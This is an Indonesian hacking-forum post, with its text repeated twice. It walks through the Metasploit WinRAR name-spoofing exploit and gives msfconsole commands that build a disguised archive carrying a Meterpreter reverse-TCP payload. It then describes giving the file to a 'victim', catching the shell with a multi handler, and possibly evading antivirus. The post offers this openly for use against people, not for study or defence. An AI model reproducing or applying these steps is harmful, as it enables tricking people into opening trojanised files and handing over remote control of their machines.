06-04-2014, 05:47 PM
Belom lama ini dunia lagi ramai dengan "Winrar File Spoofing"
sampai-sampai metasploit membual module exploit nya..
saya pun tertarik untuk mencoba nya ^ ^ :d
Menurut saya ini cukup bagus ya,buat memanipulasi trap / jebakan ) ke victim
karna lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )
Requiment :
Metasploit v4.9.2 atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736
ok..mari kita coba ><
Open your metasploit console
[hide]
msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport
Kita buat file nya dengan perintah "exploit"
file di directory /root/.msf4/local/
ok,next kita hanya tinggal kasih ke victim
Jalankan exploit multi handler
untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat
and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session
[/hide]
Postingan ini boleh di share/di perbanyak,dengan menyertai link sumber dibawah :
http://carbelius.blogspot.com/2014/06/wi...ploit.html
thx IBTeam :-bd
sampai-sampai metasploit membual module exploit nya..
saya pun tertarik untuk mencoba nya ^ ^ :d
Menurut saya ini cukup bagus ya,buat memanipulasi trap / jebakan ) ke victim
karna lolos dari Anti Virus ( entahlah, gak banyak saya test ke AV lain )
Requiment :
Metasploit v4.9.2 atau lebih
more info about metasploit v4.9.2 at https://community.rapid7.com/docs/DOC-2736
ok..mari kita coba ><
Open your metasploit console
[hide]
msf > use exploit/windows/fileformat/winrar_name_spoofing
msf > set filename [ Name_File ]
msf > set spoof [ File_Trap ]
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost [ your IP ]
msf > set lport
Kita buat file nya dengan perintah "exploit"
file di directory /root/.msf4/local/
ok,next kita hanya tinggal kasih ke victim
Jalankan exploit multi handler
untuk melisten/ menerima koneksi dari target via exploit yg tadi dibuat
and..ketik si victim membuka file tersebut,
**damm ,you got meterpreter session
[/hide]
Postingan ini boleh di share/di perbanyak,dengan menyertai link sumber dibawah :
http://carbelius.blogspot.com/2014/06/wi...ploit.html
thx IBTeam :-bd